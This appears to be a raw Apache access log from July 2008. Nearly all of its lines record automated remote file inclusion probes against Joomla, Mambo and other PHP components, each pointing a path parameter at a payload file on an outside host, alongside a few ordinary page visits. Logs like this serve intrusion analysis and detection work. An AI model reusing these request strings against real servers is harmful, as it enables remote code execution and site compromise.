207.44.208.63 - - [28/Jul/2008:21:46:46 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
207.44.208.63 - - [28/Jul/2008:21:46:46 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
64.191.6.148 - - [28/Jul/2008:21:47:35 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:21:47:35 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
81.198.180.10 - - [28/Jul/2008:21:47:57 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
204.15.10.22 - - [28/Jul/2008:21:48:21 -0500] "GET /logs/access_log.1214438400/?path[docroot]=http://dantman.com/.../rid??? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
204.15.10.22 - - [28/Jul/2008:21:48:21 -0500] "GET /logs/access_log.1214438400/?path[docroot]=http://dantman.com/.../rid??? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
204.15.10.22 - - [28/Jul/2008:21:48:27 -0500] "GET /logs/access_log.1214438400/?path[docroot]=http://dantman.com/.../rid??? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
210.245.87.117 - - [28/Jul/2008:21:48:28 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:21:48:28 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:21:49:12 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:21:49:12 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:21:49:14 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:21:49:14 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
204.15.10.22 - - [28/Jul/2008:21:49:37 -0500] "GET /?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
204.15.10.22 - - [28/Jul/2008:21:49:38 -0500] "GET /logs/?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 200 93161 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.169.0.50 - - [28/Jul/2008:21:50:17 -0500] "GET /?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 200 1243 "-""Mozilla/4.61 [en] (OS/2; U)"
62.169.0.50 - - [28/Jul/2008:21:50:18 -0500] "GET /logs/?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 200 93161 "-""Mozilla/4.61 [en] (OS/2; U)"
69.64.48.146 - - [28/Jul/2008:21:50:31 -0500] "GET /?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 200 1243 "-""Avant Browser (http://www.avantbrowser.com)"
69.64.48.146 - - [28/Jul/2008:21:50:32 -0500] "GET /logs/?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 200 93161 "-""Avant Browser (http://www.avantbrowser.com)"
64.191.6.148 - - [28/Jul/2008:21:50:51 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:21:50:51 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
193.178.228.12 - - [28/Jul/2008:21:51:42 -0500] "GET /?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 200 1243 "-""Advanced Browser (http://www.avantbrowser.com)"
193.178.228.12 - - [28/Jul/2008:21:51:44 -0500] "GET /logs/?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 200 93161 "-""Advanced Browser (http://www.avantbrowser.com)"
201.17.3.26 - - [28/Jul/2008:21:52:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:21:52:20 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
60.234.162.244 - - [28/Jul/2008:21:53:01 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
60.234.162.244 - - [28/Jul/2008:21:53:51 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
60.234.162.244 - - [28/Jul/2008:21:53:52 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
60.234.162.244 - - [28/Jul/2008:21:53:52 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
60.234.162.244 - - [28/Jul/2008:21:53:53 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
60.234.162.244 - - [28/Jul/2008:21:53:59 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
195.95.229.220 - - [28/Jul/2008:21:54:05 -0500] "GET /logs/access_log.1213315200/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.95.229.220 - - [28/Jul/2008:21:54:05 -0500] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.95.229.220 - - [28/Jul/2008:21:54:05 -0500] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.5.163.212 - - [28/Jul/2008:21:55:01 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
201.17.3.26 - - [28/Jul/2008:21:56:37 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:21:56:39 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:21:57:09 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.191.6.148 - - [28/Jul/2008:21:57:09 -0500] "GET /logs/index.php?option=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:21:57:09 -0500] "GET /index.php?option=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
210.245.87.117 - - [28/Jul/2008:21:57:09 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
201.17.3.26 - - [28/Jul/2008:21:57:20 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:21:57:23 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.106.22.71 - - [28/Jul/2008:21:58:23 -0500] "GET /logs//atom.php5?page=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.22.71 - - [28/Jul/2008:21:58:24 -0500] "GET //atom.php5?page=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:21:58:24 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:21:58:24 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:21:58:26 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:21:58:26 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
69.73.165.251 - - [28/Jul/2008:21:58:38 -0500] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
69.73.165.251 - - [28/Jul/2008:21:58:38 -0500] "GET //oneadmin/newspublish/include.php?path[docroot]=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
209.216.249.151 - - [28/Jul/2008:22:00:05 -0500] "GET /logs/access_log.1214438400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.paintballdv.ru/pball27/images/idpepez2.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
209.216.249.151 - - [28/Jul/2008:22:00:08 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.paintballdv.ru/pball27/images/idpepez2.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
209.216.249.151 - - [28/Jul/2008:22:00:08 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.paintballdv.ru/pball27/images/idpepez2.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
195.42.160.22 - - [28/Jul/2008:22:01:50 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.48"
190.54.62.66 - - [28/Jul/2008:22:02:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
209.216.249.151 - - [28/Jul/2008:22:02:20 -0500] "GET /logs/access_log.1212883200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.paintballdv.ru/pball27/images/idpepez2.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
67.41.4.26 - - [28/Jul/2008:22:03:16 -0500] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://alamal-de.com/db/on.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
67.41.4.26 - - [28/Jul/2008:22:03:16 -0500] "GET //oneadmin/newspublish/include.php?path[docroot]=http://alamal-de.com/db/on.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
209.216.249.151 - - [28/Jul/2008:22:03:41 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.paintballdv.ru/pball27/images/idpepez2.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
209.216.249.151 - - [28/Jul/2008:22:04:27 -0500] "GET /logs/access_log.1213142400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.paintballdv.ru/pball27/images/idpepez2.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
64.191.6.148 - - [28/Jul/2008:22:04:50 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:22:04:50 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
89.111.176.28 - - [28/Jul/2008:22:05:03 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.176.28 - - [28/Jul/2008:22:05:04 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.97.201.148 - - [28/Jul/2008:22:05:50 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:05:50 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
81.169.186.162 - - [28/Jul/2008:22:06:02 -0500] "GET /logs/access_log.1214438400//Neos_Chronos/header.php?base_folder=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
81.169.186.162 - - [28/Jul/2008:22:06:02 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
81.169.186.162 - - [28/Jul/2008:22:06:02 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
70.85.201.66 - - [28/Jul/2008:22:06:32 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
195.42.160.22 - - [28/Jul/2008:22:08:36 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 314 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:08:36 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:08:39 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 314 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:08:39 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.48"
81.198.180.10 - - [28/Jul/2008:22:09:28 -0500] "GET /logs/access_log.1214438400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:22:09:31 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
70.85.201.66 - - [28/Jul/2008:22:10:52 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
81.198.180.10 - - [28/Jul/2008:22:11:15 -0500] "GET /logs/access_log.1212883200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:22:11:28 -0500] "GET /logs/access_log.1214438400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:22:11:30 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:12:23 -0500] "GET /logs/access_log.1214438400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:12:24 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:12:24 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:22:12:37 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:12:37 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
81.198.180.10 - - [28/Jul/2008:22:12:54 -0500] "GET /logs/access_log.1212883200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:22:12:55 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:22:12:58 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:12:59 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:13:24 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
81.198.180.10 - - [28/Jul/2008:22:13:54 -0500] "GET /logs/access_log.1213142400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
201.17.3.26 - - [28/Jul/2008:22:13:59 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:22:14:05 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
81.198.180.10 - - [28/Jul/2008:22:14:13 -0500] "GET /logs/access_log.1213142400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:22:14:14 -0500] "GET /logs/access_log.1213315200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
64.191.6.148 - - [28/Jul/2008:22:14:17 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:22:14:17 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
81.169.186.162 - - [28/Jul/2008:22:14:24 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
210.127.253.161 - - [28/Jul/2008:22:15:17 -0500] "GET /logs/access_log.1212883200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
209.97.201.148 - - [28/Jul/2008:22:17:58 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:17:58 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.127.253.161 - - [28/Jul/2008:22:18:54 -0500] "GET /logs/access_log.1214438400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:18:54 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:18:55 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
200.99.76.3 - - [28/Jul/2008:22:19:40 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:22:19:41 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:19:59 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:19:59 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.127.253.161 - - [28/Jul/2008:22:22:12 -0500] "GET /logs/access_log.1212883200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
62.76.116.20 - - [28/Jul/2008:22:23:47 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:22:23:47 -0500] "GET /logs/access_log.1213315200%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 375 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:22:23:47 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
210.127.253.161 - - [28/Jul/2008:22:24:41 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:24:48 -0500] "GET /logs/join.php??DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:24:48 -0500] "GET /join.php??DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:25:00 -0500] "GET /logs/access_log.1213142400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
210.127.253.161 - - [28/Jul/2008:22:25:01 -0500] "GET /logs/access_log.1213315200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
190.54.62.66 - - [28/Jul/2008:22:25:32 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:22:25:35 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:22:25:59 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:22:26:02 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
72.52.131.56 - - [28/Jul/2008:22:26:04 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
72.52.131.56 - - [28/Jul/2008:22:26:04 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
200.99.76.3 - - [28/Jul/2008:22:26:14 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:22:26:15 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.30.194.70 - - [28/Jul/2008:22:26:30 -0500] "GET /logs/access_log.1212883200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/3.0 (OS/2; U)"
